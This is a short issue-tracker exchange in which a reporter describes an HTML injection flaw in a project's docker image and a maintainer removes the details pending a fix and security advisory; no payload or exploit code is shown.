M4LuZ
commented
4 months ago As per the other ticket: Many thanks for the report, but I'll remove the details for now until we are able to publish a fix and then we'll release the related security advisory
In your code it is possible to do a HTML injection. This is just an example with your newest docker image you provided a view days ago: URL removed
At the bottom of the page i have included a HTML submit form which is not part of the website. If I were malicious i could do nasty stuff to the lan guests.